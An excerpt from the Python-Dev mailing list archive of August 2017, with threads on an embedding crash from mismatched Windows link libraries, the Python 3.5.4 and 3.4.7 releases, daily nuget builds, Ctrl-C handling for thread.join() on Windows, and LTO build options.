the GIL isn't initialized until you create a new thread. //arry/ -------------- next part -------------- An HTML attachment was scrubbed... URL: From patrick.rutkowski at gmail.com Mon Aug 7 21:21:41 2017 From: patrick.rutkowski at gmail.com (Patrick Rutkowski) Date: Mon, 7 Aug 2017 21:21:41 -0400 Subject: [Python-Dev] PyThreadState_GET() returns NULL from within PyImport_GetModuleDict() In-Reply-To: <2b758940-ce06-f357-88f2-5ec1fb15dd55@hastings.org> References: <2b758940-ce06-f357-88f2-5ec1fb15dd55@hastings.org> Message-ID: On Mon, Aug 7, 2017 at 8:44 PM, Larry Hastings wrote: > > My one idea: the GIL isn't initialized until you create a new thread. > That didn't seem to be it. I put a CreateThread() call right after Py_Initialize(), and that didn't fix it. I also moved it around to before Py_Initialize() and various other places, and nothing helped. From patrick.rutkowski at gmail.com Tue Aug 8 01:31:46 2017 From: patrick.rutkowski at gmail.com (Patrick Rutkowski) Date: Tue, 8 Aug 2017 01:31:46 -0400 Subject: [Python-Dev] PyThreadState_GET() returns NULL from within PyImport_GetModuleDict() In-Reply-To: References: Message-ID: After much stumbling around in the dark I have the answer. The following table shows the results of tests which I performed pairing different build configurations of my WinMain() app with different python libraries. The terms "Release" and "Debug" refer to the configuration type in Visual Studio. All builds were done in x64 mode. Debug | python36.lib | Works Debug | python36_d.lib | Works Debug | python3_d.lib | Works Debug | python3.lib | !!! CRASHES !!! Release | python36.lib | Works Release | python36_d.lib | Works Release | python3_d.lib | !!! CRASHES !!! Release | python3.lib | Works So, it seems to be the case that picking a mismatched python binary causes the crash, __but only with python3, not with python36__. This makes me wonder what the differences is between the two in the first place. I was getting the crash to begin with because I was linking my Debug build with the release build python3.lib, since I thought it shouldn't matter. My problem is fixed now, but if anyone could sheld light on the details of why exactly it happened then I would certainy be interested. On Mon, Aug 7, 2017 at 8:11 PM, Patrick Rutkowski wrote: > I'm working on Windows. I have the following dead simple embedding > code that I'm using to test out the python interpreter: > > ============================================================ > > Py_SetProgramName(L"MyApp"); > > Py_SetPath( > L"C:\\Users\\rutski\\Documents\\python\\PCBuild\\amd64\\python36.zip;" > L"C:\\Users\\rutski\\Documents\\python\\DLLs;" > L"C:\\Users\\rutski\\Documents\\python\\lib;" > L"C:\\Users\\rutski\\Documents\\python\\PCBuild\\amd64;" > L"C:\\Users\\rutski\\Documents\\python;" > L"C:\\Users\\rutski\\Documents\\python\\lib\\site-packages"); > > Py_Initialize(); > > PyRun_SimpleString( > "from time import time,ctime\n" > "print('Today is', ctime(time()))\n"); > > ============================================================ > > This code crashes trying to access address 0x00000010 from within > PyRun_SimpleString(). The sequence of event's is this: > > 1) PyRun_SimpleString() tries to do AddModule("__main__") > 2) AddModule tries to do PyImport_GetModuleDict() > 3) PyImport_GetModuleDict() tries to doPyThreadState_GET()->interp > 4) PyThreadState_GET() returns NULL, so the ->interp part crashes. > > The weird thing is that calling PyImport_GetModuleDict() from within > my application directly works just fine. Weirder still is that the > whole thing actually executes fine if I build a windows command line > application with the embed code in main(), and execute it from a > terminal. The crash only happens when building a Windows GUI > application and calling the embed code in WinMain(). > > This is a python interpreter that I built from source on windows using > PCbuild\build.bat, so that I could track the crash. However, the exact > same crash was happening with the stock interpreter provided by the > python windows installer. > > Does anyone have any ideas here? > -Patrick From larry at hastings.org Tue Aug 8 06:58:55 2017 From: larry at hastings.org (Larry Hastings) Date: Tue, 8 Aug 2017 03:58:55 -0700 Subject: [Python-Dev] [RELEASED] Python 3.5.4 is now available Message-ID: <86871e7f-2117-f05f-7c55-c3a7ddab920d@hastings.org> On behalf of the Python development community and the Python 3.5 release team, I'm pleased to announce the availability of Python 3.5.4. Python 3.5.4 is the final 3.5 release in "bug fix" mode. The Python 3.5 branch has now transitioned into "security fixes mode"; all future improvements in the 3.5 branch will be security fixes only, and no conventional bug fixes will be merged. You can find Python 3.5.4 here: https://www.python.org/downloads/release/python-354/ Python 3.4.7 final will be released later today. Happy Pythoning, //arry/ -------------- next part -------------- An HTML attachment was scrubbed... URL: From larry at hastings.org Tue Aug 8 07:22:30 2017 From: larry at hastings.org (Larry Hastings) Date: Tue, 8 Aug 2017 04:22:30 -0700 Subject: [Python-Dev] Python 3.5 has now transitioned to "security fixes only" mode Message-ID: <6bf6b31d-0afd-a1bb-a5ae-ae0650fb842c@hastings.org> The Python 3.5 branch has now entered "security fixes only" mode. No more bugfixes will be accepted into the 3.5 branch. In keeping with our modern workflow, I have changed the permissions on the 3.5 branch on Github so that only release managers can accept PRs into the branch. Please add me to your 3.5 security fix PRs, as I'm the one responsible for accepting them. (This was already true for the 3.4 branch, too.) I neglected to mention it in the release announcement, but this transition also means no more binary installers for 3.5 releases. This signals the end of my interactions with macOS Platform Expert Ned Deily and Windows Platform Expert Steve Dower when making releases. I just wanted to mention what a pleasure it has been working with those two gentlemen for the two Python releases I've RM'd for. They've made me look good every time. Cheers, //arry/ -------------- next part -------------- An HTML attachment was scrubbed... URL: From jonathan at slenders.be Tue Aug 8 05:54:28 2017 From: jonathan at slenders.be (Jonathan Slenders) Date: Tue, 8 Aug 2017 11:54:28 +0200 Subject: [Python-Dev] Interrupt thread.join() with Ctrl-C / KeyboardInterrupt on Windows Message-ID: Hi all, Is it possible that thread.join() cannot be interrupted on Windows, while it can be on Linux? Would this be a bug, or is it by design? import threading, time def wait(): time.sleep(1000) t = threading.Thread(target=wait) t.start() t.join() # Press Control-C now. It stops on Linux, while it hangs on Windows. Tested on Python 3.6. Thanks, Jonathan -------------- next part -------------- An HTML attachment was scrubbed... URL: From steve.dower at python.org Tue Aug 8 11:39:12 2017 From: steve.dower at python.org (Steve Dower) Date: Tue, 8 Aug 2017 08:39:12 -0700 Subject: [Python-Dev] PyThreadState_GET() returns NULL from within PyImport_GetModuleDict() In-Reply-To: References: Message-ID: On 07Aug2017 2231, Patrick Rutkowski wrote: > So, it seems to be the case that picking a mismatched python binary > causes the crash, __but only with python3, not with python36__. This > makes me wonder what the differences is between the two in the first > place. I was getting the crash to begin with because I was linking my > Debug build with the release build python3.lib, since I thought it > shouldn't matter. > > My problem is fixed now, but if anyone could sheld light on the > details of why exactly it happened then I would certainy be > interested. I'd love to be able to, but honestly I have basically no idea. There is only one implementation of PyThreadState_Get() (which is what the PyThreadState_GET macro should map to), and that should never return NULL without terminating the entire process. My best guess is that the API forwarding being done by python3.dll is failing somehow and is turning into a function that returns 0. Since you are embedding rather than building an extension module, I'd suggest linking directly to python36[_d].dll, since you will presumably be including the Python runtime with your application (this is exactly the use case for the embeddable package, in case you hadn't seen that). The python3[_d].dll is most useful when building a .pyd that may be used with multiple versions of Python 3. It has some limitations and many bugs though, which I don't know we can ever fully resolve, but all of which can be avoided in your case by not using it :) Hope that helps, Steve From steve.dower at python.org Tue Aug 8 12:21:51 2017 From: steve.dower at python.org (Steve Dower) Date: Tue, 8 Aug 2017 09:21:51 -0700 Subject: [Python-Dev] [ANN] Daily Windows builds of Python 3.x Message-ID: <2e89743a-4a08-d1df-1fb7-a3c08bd35187@python.org> Hi all As part of a deal with Zach Ware at PyCon, I agreed that if he removed the Subversion dependency from our builds, I would set up daily Windows builds of Python. Zach did an excellent job, and so I am now following through on my half of the deal :) For a while I've been uploading the official releases to nuget.org. These packages can be installed with nuget.exe (latest version always available at https://aka.ms/nugetclidl), which is quickly becoming a standard tool in Microsoft's build toolsets. It's very much a CI-focused package manager, rather than a user-focused one, and CI on Windows was previously an area where it was difficult to use Python. See the official feed at https://www.nuget.org/packages/python, and related packages pythonx86, python2 and python2x86. For people looking for an official "no installer" version of Python for Windows, this is it. And since all the infrastructure was there already, I decided to publish daily builds in a similar way to myget.org: https://www.myget.org/feed/python/package/nuget/pythondaily To install the latest daily build, run nuget.exe with this command: nuget.exe pythondaily -Source https://www.myget.org/F/python/api/v3/index.json (Note that if you already have a "pythondaily" package in that directory, nuget will consider the requirement satisfied. As I said, it's meant for reproducible CI builds rather than users who want to update things in the least amount of keystrokes :) ) The sys.version string contains the short commit hash. Please include this string when reporting bugs in these builds. Also, only the amd64 Release build is available pre-built. >>> sys.version '3.7.0a0 (remotes/origin/master:733d0f63c, Aug 8 2017, 15:56:14) [MSC v.1900 64 bit (AMD64)]' Hopefully this is valuable for people who want to include daily builds in their own test runs or validate recent bug fixes. Cheers, Steve From victor.stinner at gmail.com Tue Aug 8 12:38:17 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Tue, 8 Aug 2017 18:38:17 +0200 Subject: [Python-Dev] [ANN] Daily Windows builds of Python 3.x In-Reply-To: <2e89743a-4a08-d1df-1fb7-a3c08bd35187@python.org> References: <2e89743a-4a08-d1df-1fb7-a3c08bd35187@python.org> Message-ID: Thank you! I recall that we discussed that, but I understood that you was too busy to implement the idea. No, you didn't forget and you made it! ;-) Victor 2017-08-08 18:21 GMT+02:00 Steve Dower : > Hi all > > As part of a deal with Zach Ware at PyCon, I agreed that if he removed the > Subversion dependency from our builds, I would set up daily Windows builds > of Python. Zach did an excellent job, and so I am now following through on > my half of the deal :) > > For a while I've been uploading the official releases to nuget.org. These > packages can be installed with nuget.exe (latest version always available at > https://aka.ms/nugetclidl), which is quickly becoming a standard tool in > Microsoft's build toolsets. It's very much a CI-focused package manager, > rather than a user-focused one, and CI on Windows was previously an area > where it was difficult to use Python. > > See the official feed at https://www.nuget.org/packages/python, and related > packages pythonx86, python2 and python2x86. > > For people looking for an official "no installer" version of Python for > Windows, this is it. > > > And since all the infrastructure was there already, I decided to publish > daily builds in a similar way to myget.org: > > https://www.myget.org/feed/python/package/nuget/pythondaily > > To install the latest daily build, run nuget.exe with this command: > > nuget.exe pythondaily -Source > https://www.myget.org/F/python/api/v3/index.json > > (Note that if you already have a "pythondaily" package in that directory, > nuget will consider the requirement satisfied. As I said, it's meant for > reproducible CI builds rather than users who want to update things in the > least amount of keystrokes :) ) > > The sys.version string contains the short commit hash. Please include this > string when reporting bugs in these builds. Also, only the amd64 Release > build is available pre-built. > > >>> sys.version > '3.7.0a0 (remotes/origin/master:733d0f63c, Aug 8 2017, 15:56:14) [MSC > v.1900 64 bit (AMD64)]' > > Hopefully this is valuable for people who want to include daily builds in > their own test runs or validate recent bug fixes. > > Cheers, > Steve > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gmail.com From p.f.moore at gmail.com Tue Aug 8 13:59:34 2017 From: p.f.moore at gmail.com (Paul Moore) Date: Tue, 8 Aug 2017 18:59:34 +0100 Subject: [Python-Dev] [ANN] Daily Windows builds of Python 3.x In-Reply-To: <2e89743a-4a08-d1df-1fb7-a3c08bd35187@python.org> References: <2e89743a-4a08-d1df-1fb7-a3c08bd35187@python.org> Message-ID: On 8 August 2017 at 17:21, Steve Dower wrote: > For a while I've been uploading the official releases to nuget.org. These > packages can be installed with nuget.exe (latest version always available at > https://aka.ms/nugetclidl), which is quickly becoming a standard tool in > Microsoft's build toolsets. It's very much a CI-focused package manager, > rather than a user-focused one, and CI on Windows was previously an area > where it was difficult to use Python. > > See the official feed at https://www.nuget.org/packages/python, and related > packages pythonx86, python2 and python2x86. > > For people looking for an official "no installer" version of Python for > Windows, this is it. I've been aware of these builds for a while, but wasn't 100% sure of the status of them. It would be really useful if they could be publicised more widely - if for no other reason than to steer people towards these rather than the embedded distribution when these are more appropriate. But regardless of that minor point, the availability of these builds is really nice. > And since all the infrastructure was there already, I decided to publish > daily builds in a similar way to myget.org: > > https://www.myget.org/feed/python/package/nuget/pythondaily > > To install the latest daily build, run nuget.exe with this command: > > nuget.exe pythondaily -Source > https://www.myget.org/F/python/api/v3/index.json > > (Note that if you already have a "pythondaily" package in that directory, > nuget will consider the requirement satisfied. As I said, it's meant for > reproducible CI builds rather than users who want to update things in the > least amount of keystrokes :) ) > > The sys.version string contains the short commit hash. Please include this > string when reporting bugs in these builds. Also, only the amd64 Release > build is available pre-built. > > >>> sys.version > '3.7.0a0 (remotes/origin/master:733d0f63c, Aug 8 2017, 15:56:14) [MSC > v.1900 64 bit (AMD64)]' > > Hopefully this is valuable for people who want to include daily builds in > their own test runs or validate recent bug fixes. Nice! I can imagine these being a really useful resource for people wanting to (say) test against the development version in their Appveyor builds. Thanks for putting the effort into producing these :-) Paul From njs at pobox.com Tue Aug 8 14:51:45 2017 From: njs at pobox.com (Nathaniel Smith) Date: Tue, 8 Aug 2017 11:51:45 -0700 Subject: [Python-Dev] Interrupt thread.join() with Ctrl-C / KeyboardInterrupt on Windows In-Reply-To: References: Message-ID: On Tue, Aug 8, 2017 at 2:54 AM, Jonathan Slenders wrote: > Hi all, > > Is it possible that thread.join() cannot be interrupted on Windows, while it > can be on Linux? > Would this be a bug, or is it by design? > > > import threading, time > def wait(): > time.sleep(1000) > t = threading.Thread(target=wait) > t.start() > t.join() # Press Control-C now. It stops on Linux, while it hangs on > Windows. This comes down to a difference in how the Linux and Windows low-level APIs handle control-C and blocking functions: on Linux, the default is that any low-level blocking function can be interrupted by a control-C or any other random signal, and it's the calling code's job to check for this and restart it if necessary. This is annoying because it means that every low-level function call inside the Python interpreter has to have a bunch of boilerplate to detect this and retry, but OTOH it means that control-C automatically works in (almost) all cases. On Windows, they made the opposite decision: low-level blocking functions are never automatically interrupted by control-C. It's a reasonable design choice. The advantage is that sloppily written programs tend to work better -- on Linux you kind of *have* to put a retry loop around *every* low level call or your program will suffer weird random bugs, and on Windows you don't. But for carefully written programs like CPython this is actually pretty annoying, because if you *do* want to wake up on a control-C, then on Windows that has to be laboriously implemented on a case-by-case basis for each blocking function, and often this requires some kind of cleverness or is actually impossible, depending on what function you want to interrupt. At least on Linux the retry loop is always the same. The end result is that on Windows, control-C almost never works to wake up a blocked Python process, with a few special exceptions where someone did the work to implement this. On Python 2 the only functions that have this implemented are time.sleep() and multiprocessing.Semaphore.acquire; on Python 3 there are a few more (you can grep the source for _PyOS_SigintEvent to find them), but Thread.join isn't one of them. It looks like Thread.join ultimately ends up blocking in Python/thread_nt.h:EnterNonRecursiveMutex, which has a maze of #ifdefs behind it -- I think there are 3 different implementation you might end up with, depending on how CPython was built? Two of them seem to ultimately block in WaitForSingleObject, which would be easy to adapt to handle control-C. Unfortunately I think the implementation that actually gets used on modern systems is the one that blocks in SleepConditionVariableSRW, and I don't see any easy way for a control-C to interrupt that. But maybe I'm missing something -- I'm not a Windows expert. -n -- Nathaniel J. Smith -- https://vorpus.org From jonathan at slenders.be Tue Aug 8 17:18:15 2017 From: jonathan at slenders.be (Jonathan Slenders) Date: Tue, 8 Aug 2017 23:18:15 +0200 Subject: [Python-Dev] Interrupt thread.join() with Ctrl-C / KeyboardInterrupt on Windows In-Reply-To: References: Message-ID: Thank you Nathaniel for the response! Really interesting and helpful. 2017-08-08 20:51 GMT+02:00 Nathaniel Smith : > On Tue, Aug 8, 2017 at 2:54 AM, Jonathan Slenders > wrote: > > Hi all, > > > > Is it possible that thread.join() cannot be interrupted on Windows, > while it > > can be on Linux? > > Would this be a bug, or is it by design? > > > > > > import threading, time > > def wait(): > > time.sleep(1000) > > t = threading.Thread(target=wait) > > t.start() > > t.join() # Press Control-C now. It stops on Linux, while it hangs on > > Windows. > > This comes down to a difference in how the Linux and Windows low-level > APIs handle control-C and blocking functions: on Linux, the default is > that any low-level blocking function can be interrupted by a control-C > or any other random signal, and it's the calling code's job to check > for this and restart it if necessary. This is annoying because it > means that every low-level function call inside the Python interpreter > has to have a bunch of boilerplate to detect this and retry, but OTOH > it means that control-C automatically works in (almost) all cases. On > Windows, they made the opposite decision: low-level blocking functions > are never automatically interrupted by control-C. It's a reasonable > design choice. The advantage is that sloppily written programs tend to > work better -- on Linux you kind of *have* to put a retry loop around > *every* low level call or your program will suffer weird random bugs, > and on Windows you don't. > > But for carefully written programs like CPython this is actually > pretty annoying, because if you *do* want to wake up on a control-C, > then on Windows that has to be laboriously implemented on a > case-by-case basis for each blocking function, and often this requires > some kind of cleverness or is actually impossible, depending on what > function you want to interrupt. At least on Linux the retry loop is > always the same. > > The end result is that on Windows, control-C almost never works to > wake up a blocked Python process, with a few special exceptions where > someone did the work to implement this. On Python 2 the only functions > that have this implemented are time.sleep() and > multiprocessing.Semaphore.acquire; on Python 3 there are a few more > (you can grep the source for _PyOS_SigintEvent to find them), but > Thread.join isn't one of them. > > It looks like Thread.join ultimately ends up blocking in > Python/thread_nt.h:EnterNonRecursiveMutex, which has a maze of #ifdefs > behind it -- I think there are 3 different implementation you might > end up with, depending on how CPython was built? Two of them seem to > ultimately block in WaitForSingleObject, which would be easy to adapt > to handle control-C. Unfortunately I think the implementation that > actually gets used on modern systems is the one that blocks in > SleepConditionVariableSRW, and I don't see any easy way for a > control-C to interrupt that. But maybe I'm missing something -- I'm > not a Windows expert. > > -n > > -- > Nathaniel J. Smith -- https://vorpus.org > -------------- next part -------------- An HTML attachment was scrubbed... URL: From steve.dower at python.org Tue Aug 8 17:29:41 2017 From: steve.dower at python.org (Steve Dower) Date: Tue, 8 Aug 2017 14:29:41 -0700 Subject: [Python-Dev] Interrupt thread.join() with Ctrl-C / KeyboardInterrupt on Windows In-Reply-To: References: Message-ID: On 08Aug2017 1151, Nathaniel Smith wrote: > It looks like Thread.join ultimately ends up blocking in > Python/thread_nt.h:EnterNonRecursiveMutex, which has a maze of #ifdefs > behind it -- I think there are 3 different implementation you might > end up with, depending on how CPython was built? Two of them seem to > ultimately block in WaitForSingleObject, which would be easy to adapt > to handle control-C. Unfortunately I think the implementation that > actually gets used on modern systems is the one that blocks in > SleepConditionVariableSRW, and I don't see any easy way for a > control-C to interrupt that. But maybe I'm missing something -- I'm > not a Windows expert. I'd have to dig back through the recent attempts at changing this, but I believe the SleepConditionVariableSRW path is unused for all versions of Windows. A couple of people (including myself) attempted to enable that code path, but it has some subtle issues that were causing test failures, so we abandoned all the attempts. Though ISTR that someone put in more effort than most of us, but I don't think we've merged it (and if we have, it'd only be in 3.7 at this stage). Cheers, Steve From njs at pobox.com Tue Aug 8 18:12:02 2017 From: njs at pobox.com (Nathaniel Smith) Date: Tue, 8 Aug 2017 15:12:02 -0700 Subject: [Python-Dev] Interrupt thread.join() with Ctrl-C / KeyboardInterrupt on Windows In-Reply-To: References: Message-ID: On Tue, Aug 8, 2017 at 2:29 PM, Steve Dower wrote: > On 08Aug2017 1151, Nathaniel Smith wrote: >> >> It looks like Thread.join ultimately ends up blocking in >> Python/thread_nt.h:EnterNonRecursiveMutex, which has a maze of #ifdefs >> behind it -- I think there are 3 different implementation you might >> end up with, depending on how CPython was built? Two of them seem to >> ultimately block in WaitForSingleObject, which would be easy to adapt >> to handle control-C. Unfortunately I think the implementation that >> actually gets used on modern systems is the one that blocks in >> SleepConditionVariableSRW, and I don't see any easy way for a >> control-C to interrupt that. But maybe I'm missing something -- I'm >> not a Windows expert. > > > I'd have to dig back through the recent attempts at changing this, but I > believe the SleepConditionVariableSRW path is unused for all versions of > Windows. > > A couple of people (including myself) attempted to enable that code path, > but it has some subtle issues that were causing test failures, so we > abandoned all the attempts. Though ISTR that someone put in more effort than > most of us, but I don't think we've merged it (and if we have, it'd only be > in 3.7 at this stage). Ah, you're right -- the comments say it's used on Windows 7 and later, but the code disagrees. Silly me for trusting the comments :-). So it looks like it would actually be fairly straightforward to add control-C interruption support. -n -- Nathaniel J. Smith -- https://vorpus.org From victor.stinner at gmail.com Tue Aug 8 18:29:24 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Wed, 9 Aug 2017 00:29:24 +0200 Subject: [Python-Dev] [RELEASED] Python 3.5.4 is now available In-Reply-To: <86871e7f-2117-f05f-7c55-c3a7ddab920d@hastings.org> References: <86871e7f-2117-f05f-7c55-c3a7ddab920d@hastings.org> Message-ID: I updated some websites and services for the 3.5.4 release: * Status of Python branches in the devguide: https://devguide.python.org/#status-of-python-branches * Python security vulnerabilities: http://python-security.readthedocs.io/vulnerabilities.html * I removed all Python 3.5 buildbots: https://github.com/python/buildmaster-config/pull/17 Zachary Ware told me that 3.5.4 now comes before 3.6.2 on https://www.python.org/downloads/ but I don't think that it's a real issue :-) *Maybe* we could group releases per Python branch? Or sort by Python branches. Victor 2017-08-08 12:58 GMT+02:00 Larry Hastings : > > On behalf of the Python development community and the Python 3.5 release > team, I'm pleased to announce the availability of Python 3.5.4. > > Python 3.5.4 is the final 3.5 release in "bug fix" mode. The Python 3.5 > branch has now transitioned into "security fixes mode"; all future > improvements in the 3.5 branch will be security fixes only, and no > conventional bug fixes will be merged. > > > You can find Python 3.5.4 here: > > https://www.python.org/downloads/release/python-354/ > > > Python 3.4.7 final will be released later today. > > > Happy Pythoning, > > > /arry > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gmail.com > From steve.dower at python.org Tue Aug 8 20:18:46 2017 From: steve.dower at python.org (Steve Dower) Date: Tue, 8 Aug 2017 17:18:46 -0700 Subject: [Python-Dev] Interrupt thread.join() with Ctrl-C / KeyboardInterrupt on Windows In-Reply-To: References: Message-ID: On 08Aug2017 1512, Nathaniel Smith wrote: > On Tue, Aug 8, 2017 at 2:29 PM, Steve Dower wrote: >> On 08Aug2017 1151, Nathaniel Smith wrote: >>> >>> It looks like Thread.join ultimately ends up blocking in >>> Python/thread_nt.h:EnterNonRecursiveMutex, which has a maze of #ifdefs >>> behind it -- I think there are 3 different implementation you might >>> end up with, depending on how CPython was built? Two of them seem to >>> ultimately block in WaitForSingleObject, which would be easy to adapt >>> to handle control-C. Unfortunately I think the implementation that >>> actually gets used on modern systems is the one that blocks in >>> SleepConditionVariableSRW, and I don't see any easy way for a >>> control-C to interrupt that. But maybe I'm missing something -- I'm >>> not a Windows expert. >> >> >> I'd have to dig back through the recent attempts at changing this, but I >> believe the SleepConditionVariableSRW path is unused for all versions of >> Windows. >> >> A couple of people (including myself) attempted to enable that code path, >> but it has some subtle issues that were causing test failures, so we >> abandoned all the attempts. Though ISTR that someone put in more effort than >> most of us, but I don't think we've merged it (and if we have, it'd only be >> in 3.7 at this stage). > > Ah, you're right -- the comments say it's used on Windows 7 and later, > but the code disagrees. Silly me for trusting the comments :-). So it > looks like it would actually be fairly straightforward to add > control-C interruption support. Except we're still hypothesising that the native condition variables will be faster than our emulation. I think until we prove or disprove that with a correct implementation, I'd rather not make a promise that Ctrl+C will work in situations where we depend on it. That's not to say that it isn't possible to continue fixing Ctrl+C handling in targeted locations. But I don't want to guarantee that an exception case like that will always work given there's a chance it may prevent us getting a performance benefit in the normal case. (I'm trying to advise caution, rather than saying it'll never happen.) Cheers, Steve From ncoghlan at gmail.com Tue Aug 8 23:36:28 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 9 Aug 2017 13:36:28 +1000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> Message-ID: On 8 August 2017 at 10:12, Gregory P. Smith wrote: > I don't know whether it is beneficial or not - but having the capability to > build LTO without PGO seems reasonable. I can review any pull requests > altering configure.ac and Makefile.pre.in to make such a change. Being able to separate them seems useful even if it's just from the performance research perspective of comparing "PGO only", "LTO only" and "PGO+LTO". The LTO only numbers may be of questionable relevance to us as CPython developers, but I can definitely see them being of interest to the folks working on C compiler toolchains. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ncoghlan at gmail.com Tue Aug 8 23:50:55 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 9 Aug 2017 13:50:55 +1000 Subject: [Python-Dev] [ANN] Daily Windows builds of Python 3.x In-Reply-To: References: <2e89743a-4a08-d1df-1fb7-a3c08bd35187@python.org> Message-ID: On 9 August 2017 at 03:59, Paul Moore wrote: > On 8 August 2017 at 17:21, Steve Dower wrote: >> For a while I've been uploading the official releases to nuget.org. These >> packages can be installed with nuget.exe (latest version always available at >> https://aka.ms/nugetclidl), which is quickly becoming a standard tool in >> Microsoft's build toolsets. It's very much a CI-focused package manager, >> rather than a user-focused one, and CI on Windows was previously an area >> where it was difficult to use Python. >> >> See the official feed at https://www.nuget.org/packages/python, and related >> packages pythonx86, python2 and python2x86. >> >> For people looking for an official "no installer" version of Python for >> Windows, this is it. > > I've been aware of these builds for a while, but wasn't 100% sure of > the status of them. It would be really useful if they could be > publicised more widely - if for no other reason than to steer people > towards these rather than the embedded distribution when these are > more appropriate. The trade-offs between the various options for managing Python runtimes on Windows would likely make sense as a packaging.python.org discussion: https://packaging.python.org/discussions/ The woefully incomplete discussion on application deployment (https://packaging.python.org/discussions/deploying-python-applications/) could then be updated to reference that rather than having to cover it inline. Cheers, Nick. P.S. Thanks to https://github.com/pypa/python-packaging-user-guide/issues/317, we have 3 clearly distinct categories of docs in PyPUG these days: tutorials, where we deliberately only present one option to avoid overwhelming readers with too much information, guides, where we're still opinionated, but acknowledge alternatives, and discussions, where the overall tone is "the right option depends on your goals" -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From larry at hastings.org Wed Aug 9 03:31:12 2017 From: larry at hastings.org (Larry Hastings) Date: Wed, 9 Aug 2017 00:31:12 -0700 Subject: [Python-Dev] [RELEASED] Python 3.4.7 is now available Message-ID: <513e80d5-170f-21f8-1429-de86a6752169@hastings.org> On behalf of the Python development community and the Python 3.4 release team, I'm pleased to announce the availability of Python 3.4.7. Python 3.4 is now in "security fixes only" mode. This is the final stage of support for Python 3.4. Python 3.4 now only receives security fixes, not bug fixes, and Python 3.4 releases are source code only--no more official binary installers will be produced. You can find Python 3.4.7 here: https://www.python.org/downloads/release/python-347/ Happy Pythoning, //arry/ -------------- next part -------------- An HTML attachment was scrubbed... URL: From solipsis at pitrou.net Wed Aug 9 03:52:52 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 9 Aug 2017 09:52:52 +0200 Subject: [Python-Dev] first post introduction and question regarding lto References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> Message-ID: <20170809095252.3340cd7b@fsol> On Wed, 9 Aug 2017 13:36:28 +1000 Nick Coghlan wrote: > On 8 August 2017 at 10:12, Gregory P. Smith wrote: > > I don't know whether it is beneficial or not - but having the capability to > > build LTO without PGO seems reasonable. I can review any pull requests > > altering configure.ac and Makefile.pre.in to make such a change. > > Being able to separate them seems useful even if it's just from the > performance research perspective of comparing "PGO only", "LTO only" > and "PGO+LTO". That does not mean "LTO only" deserves a configure option, though. PGO is difficult to set up manually so it's fair that we provide dedicated build support for it. LTO should just be a matter of tweaking CFLAGS and LDFLAGS. Regards Antoine. From solipsis at pitrou.net Wed Aug 9 03:58:30 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 9 Aug 2017 09:58:30 +0200 Subject: [Python-Dev] Interrupt thread.join() with Ctrl-C / KeyboardInterrupt on Windows References: Message-ID: <20170809095830.0ec5f712@fsol> On Tue, 8 Aug 2017 14:29:41 -0700 Steve Dower wrote: > On 08Aug2017 1151, Nathaniel Smith wrote: > > It looks like Thread.join ultimately ends up blocking in > > Python/thread_nt.h:EnterNonRecursiveMutex, which has a maze of #ifdefs > > behind it -- I think there are 3 different implementation you might > > end up with, depending on how CPython was built? Two of them seem to > > ultimately block in WaitForSingleObject, which would be easy to adapt > > to handle control-C. Unfortunately I think the implementation that > > actually gets used on modern systems is the one that blocks in > > SleepConditionVariableSRW, and I don't see any easy way for a > > control-C to interrupt that. But maybe I'm missing something -- I'm > > not a Windows expert. > > I'd have to dig back through the recent attempts at changing this, but I > believe the SleepConditionVariableSRW path is unused for all versions of > Windows. > > A couple of people (including myself) attempted to enable that code > path, but it has some subtle issues that were causing test failures, so > we abandoned all the attempts. Though ISTR that someone put in more > effort than most of us, but I don't think we've merged it (and if we > have, it'd only be in 3.7 at this stage). For the record, there are issues open for this: - locks not interruptible on Windows: https://bugs.python.org/issue29971 - enable optimized locks on Windows: https://bugs.python.org/issue29871 Having Lock.acquire() be interruptible would be really nice as it's the basis for so many of our synchronization primitives (including Thread.join(), I believe). Regards Antoine. From victor.stinner at gmail.com Wed Aug 9 05:16:36 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Wed, 9 Aug 2017 11:16:36 +0200 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: <20170809095252.3340cd7b@fsol> References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> <20170809095252.3340cd7b@fsol> Message-ID: There is already a ./configure --with-lto flag, why not using it? I'm using --with-lto without PGO for months, I never noticed that the option is fully ignored! Victor 2017-08-09 9:52 GMT+02:00 Antoine Pitrou : > On Wed, 9 Aug 2017 13:36:28 +1000 > Nick Coghlan wrote: >> On 8 August 2017 at 10:12, Gregory P. Smith wrote: >> > I don't know whether it is beneficial or not - but having the capability to 